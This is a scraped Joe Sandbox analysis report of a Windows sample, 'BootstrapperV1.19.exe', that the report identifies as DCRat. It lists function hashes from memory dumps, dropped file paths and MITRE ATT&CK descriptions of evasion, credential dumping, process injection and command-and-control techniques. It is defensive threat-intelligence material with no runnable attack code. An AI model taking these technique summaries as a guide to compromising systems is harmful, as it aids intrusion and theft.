Instruction Fuzzy Hash: C4110B22F1E56A0BF7A4E76C44313B961D2EF98360F0542B6E45DC31E7ED1C6E444B81

Function 00007FFD9BAB257B Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1695f9011940f600c4ff131e228e2cdfb0116adbebec2a697214469c8ffac4
Instruction ID: a760d6fc6c45c86cfeefb0ac3206b222bdb0ef01d12b371ea7b9860d243eef0b
Opcode Fuzzy Hash: 9d1695f9011940f600c4ff131e228e2cdfb0116adbebec2a697214469c8ffac4
Instruction Fuzzy Hash: 1E213330E0992D8FDB64DB48D860BA877A1FB54310F1545BAD01EE32A1CA79AEC1CF45

Function 00007FFD9BAB108D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595865f9ac49519f6e07fb473f9c672e1eef0bf6e3e3ed6c2c7e1281b746ec28
Instruction ID: 68c969947e36b841aabdb8180abd70e94199a5f303f64082bae0b835292d4364
Opcode Fuzzy Hash: 595865f9ac49519f6e07fb473f9c672e1eef0bf6e3e3ed6c2c7e1281b746ec28
Instruction Fuzzy Hash: 88012B1195E6D51FD76957B44C715B13F90CF97260B0A01FAD095CB1F3C88D18868351

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b508dd2fc52da2ce6d519f5edafab9781ed6cc27cd4afca38914279c2a730195
Instruction ID: e10dcca21811afb16b1ec244e835bb7578edace44dc64ed1a122fa74d9b1f4fa
Opcode Fuzzy Hash: b508dd2fc52da2ce6d519f5edafab9781ed6cc27cd4afca38914279c2a730195
Instruction Fuzzy Hash: B2112531B0D25C8FE722EBA8C8601EC7FB0EF52310F0645B7C054DB2A2EA7856058B84

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a93bbe4ddfd84c33f725c8ba123d90caa396b219fb4306dab0cd68829200c0
Instruction ID: 45537faf2bc08fd949a9ab96697a2fe9e5293f80001a51c0ccddb7999d442182
Opcode Fuzzy Hash: 94a93bbe4ddfd84c33f725c8ba123d90caa396b219fb4306dab0cd68829200c0
Instruction Fuzzy Hash: DC01C431A0D29C8FE722DBA8C8601DD7FB0EF56310F1545B7D054DB2A2DA7456458B84

Function 00007FFD9BAB677D Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4cde3bfe63f0488c7b4debe9dc85052246be7a66b0068182d3c7cadc1d1fc23
Instruction ID: 9e8743dcee7a80611661799a11cf0675e20b771b19680cc69d0585faf3e917b3
Opcode Fuzzy Hash: f4cde3bfe63f0488c7b4debe9dc85052246be7a66b0068182d3c7cadc1d1fc23
Instruction Fuzzy Hash: A3014421F1A82D4EE7B0979C84347BC92D1EF48710F5601B5D46DE32F5DD68AE404B00

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a236a219535f05123e48a59ae01efc467d928eaf20ff39d1bfbfb97ea65ef8c9
Instruction ID: 1b563342e310eaef12a75398be50d70b8f43e9575c649e04e3af15316bf52e82
Opcode Fuzzy Hash: a236a219535f05123e48a59ae01efc467d928eaf20ff39d1bfbfb97ea65ef8c9
Instruction Fuzzy Hash: 0E01B131A0E28C8FE722EBA8C8601DC7FB0EF56310F1541F7D054DB2A2EA786644CB80

Function 00007FFD9BAB67BE Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ed77b3ee9512be791f139bbb78e80d932ad8a684d0b4f98781cc3bdaf590ab
Instruction ID: c84e94f8700a5da25a89b18cc978d32332eb98e6dd78a325826209b5597b3a24
Opcode Fuzzy Hash: d9ed77b3ee9512be791f139bbb78e80d932ad8a684d0b4f98781cc3bdaf590ab
Instruction Fuzzy Hash: 8401F431F1A82E4EEB74AB98C864AF97361EF54310F5605B9C01DD72F1DDB86A818E00

Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bdbfb8008c0cebc7d9fe5aa3a84915b0d5a394845714f64351a85b9edff9b1e
Instruction ID: 46a05a63e6d721d9767d9d40e66ba3098e352b87dc28e80420f3d960c2f1b51f
Opcode Fuzzy Hash: 3bdbfb8008c0cebc7d9fe5aa3a84915b0d5a394845714f64351a85b9edff9b1e
Instruction Fuzzy Hash: AD01A230E0E28D9FE721EBA488641DD7FB0EF56304F1541E7D054DB2A6EA785644CB81

Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f23fd8ff7d3dbc033ca4ce13e8970fcd12da7b2d08477b8899274bfec7eb3f
Instruction ID: ce6d2b48a3629fd41846294db981db9ec435e9a63f869b155bf05f22009fdd38
Opcode Fuzzy Hash: 01f23fd8ff7d3dbc033ca4ce13e8970fcd12da7b2d08477b8899274bfec7eb3f
Instruction Fuzzy Hash: 32F0E53511E649CFD741DB38C8A56C4BFA0FF02649F8A11FAC08AC75A2E3245C5DCB40

Function 00007FFD9BAB6875 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e86717bdb073f436a190d2855632088ba179429547b89731434fb8820439f1f
Instruction ID: ad6d68973ca28b61c4c5b27e6b4c7099c6e00c61a3f3731e02e96e6e7c978da2
Opcode Fuzzy Hash: 6e86717bdb073f436a190d2855632088ba179429547b89731434fb8820439f1f
Instruction Fuzzy Hash: 8EF05431F0A41D4EEB70EB88C464BF96392EF55310F1642B5C41DD72F5DD68BA818E40

Function 00007FFD9BAB0D07 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e983f40b709b5bfea59c0b13adc4c3cdeb24bb54e43aff68340677cfa0abdb
Instruction ID: 74b7a0155316131d57192a7db8c651bee971bf4ff048114bf84620e801e9e940
Opcode Fuzzy Hash: 85e983f40b709b5bfea59c0b13adc4c3cdeb24bb54e43aff68340677cfa0abdb
Instruction Fuzzy Hash: 23F0B430F0960E8FE764DB6984A46BD77E0EF55711F1042BAD019C22D5DA7866848F44

Function 00007FFD9BAB10C0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d815330f0ae0852c63c7eee0d72713f426d07b677879dce111832211fc32f74d
Instruction ID: 783ab0265ee28872421e01d5319368944899f51d0faa24d482b923d980380965
Opcode Fuzzy Hash: d815330f0ae0852c63c7eee0d72713f426d07b677879dce111832211fc32f74d
Instruction Fuzzy Hash: FFE02621F1C85906EB7CB67468B25B07280DF85324B0502B9D42AC22DACC4D1CC14381

Function 00007FFD9BAB4B47 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8abae7e4bf594c026a3c2e0c3309027240db6ecfc1cde7bd98f6a8efb3b4e525
Instruction ID: 19a67f0a305d25ba98c9390f1bdcbfa2bf199a8fd26aefa9b1e563cfd8605895
Opcode Fuzzy Hash: 8abae7e4bf594c026a3c2e0c3309027240db6ecfc1cde7bd98f6a8efb3b4e525
Instruction Fuzzy Hash: 4AE01220F1912A46F7B49344C8707AD7295EBA4300F1540B8D51EA33E1CD78AF45CF49

Function 00007FFD9BAB0855 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8412c96ce81615c6353acab22cf40caa1155164eef89bcc1232d6f886c5ba5e4
Instruction ID: cfbfc06b0b0e6ae27cebf3b4cf1c5dd14bf8a85e1874eb3d8a6160c83235200c
Opcode Fuzzy Hash: 8412c96ce81615c6353acab22cf40caa1155164eef89bcc1232d6f886c5ba5e4
Instruction Fuzzy Hash: 4CC08C34A1180C8FD908EB2CC98490833E0FB0A304BC200A0E00DC7172E65AEDC2CB81

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
Instruction ID: 8b62a2613242e5d00bb5040576e828843c3d016d40306d0e4ac823cb9bde0458
Opcode Fuzzy Hash: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
Instruction Fuzzy Hash: 40C04C05F5B53F01F53573EF58760ACB5409BD5A50FD70176D52C800E19CDD22D50A5E

Function 00007FFD9BAB64EC Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6524eeca7e0f7a46f031b6ffd445f97ae654a5d377843ddc14cf26d532475833
Instruction ID: 16d86103845ac531eef7d8b09cfd11588e8c2c14ca39991880721322c73647a4
Opcode Fuzzy Hash: 6524eeca7e0f7a46f031b6ffd445f97ae654a5d377843ddc14cf26d532475833
Instruction Fuzzy Hash: 1FC04C01F2CC2E46F6696318483167E04525F5471DF5501B8E02E863DECD6C5D4216CB

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
Instruction ID: c37ab9bc07c87af99de6e91fc235e2982cd53192ceec1f1e43b33c0e7cc27f63
Opcode Fuzzy Hash: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
Instruction Fuzzy Hash: EFB01204D5742F00E53433FB0C5206874409B44100FC20070D41C8009198CD12940B47

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BAB0B3E
c9, xrefs: 00007FFD9BAB0B56
!k9, xrefs: 00007FFD9BAB0B4E
"s9, xrefs: 00007FFD9BAB0B46

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 6f275f707c27e1e373fe3aca86a1946b8b5f99f60616248b3690759445dfc79e
Instruction ID: 121aaad85f25199983486927109cb33aa3c0799bf483374e5128a036fcb7ca8e
Opcode Fuzzy Hash: 6f275f707c27e1e373fe3aca86a1946b8b5f99f60616248b3690759445dfc79e
Instruction Fuzzy Hash: 89419007B0957645E23973FD78229ED5B448FA927FB0847B7F56E8D0D74C486081C2E9

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BootstrapperV1.19.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\2036bbf9130283

C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe

C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\2036bbf9130283

C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.1_acfe46f69353e7873b32e3e17f3d3a8ab076eb_d2093ef2_f18a3c45-9587-46c0-b8f2-b7c436a166cc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5022.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER57E4.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5862.tmp.xml

C:\Recovery\2036bbf9130283

Windows Analysis Report
BootstrapperV1.19.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

